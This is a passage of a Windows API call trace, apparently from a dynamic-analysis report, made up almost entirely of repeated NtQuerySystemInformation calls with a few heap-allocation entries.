SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x38, ResultLength=0x0) [0185.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe740, Length=0x28, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe740, Length=0x28, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe740, Length=0x28, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe740, Length=0x28, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7b0, Length=0x28, ResultLength=0x0) [0185.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x38, ResultLength=0x0) [0185.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x28, ResultLength=0x0) [0185.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x28, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x20, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe650, Length=0x20, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe650, Length=0x20, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe650, Length=0x20, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x38, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x38, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe790, Length=0x20, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe720, Length=0x20, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe720, Length=0x20, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.204] GetProcessHeap () returned 0x27fc8db0000 [0185.204] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8eaed20 [0185.206] GetProcessHeap () returned 0x27fc8db0000 [0185.206] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc8dfc620 [0185.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x50, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x50, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x50, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x50, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x50, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x50, ResultLength=0x0) [0185.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff000, Length=0x50, ResultLength=0x0) [0185.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0185.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0185.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x28, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0185.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0185.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x38, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x20, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x50, ResultLength=0x0) [0185.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x50, ResultLength=0x0) [0185.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x50, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x50, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x50, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x50, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x50, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x38, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x28, ResultLength=0x0) [0185.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x38, ResultLength=0x0) [0185.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x28, ResultLength=0x0) [0185.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x28, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x20, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x20, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x20, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x20, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x38, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x38, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc20, Length=0x20, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x20, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe1d0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0c0, Length=0x50, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x28, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x28, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x28, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x28, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x20, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x20, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdff0, Length=0x38, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x20, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde00, Length=0x20, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.362] NtQuerySystemInformation 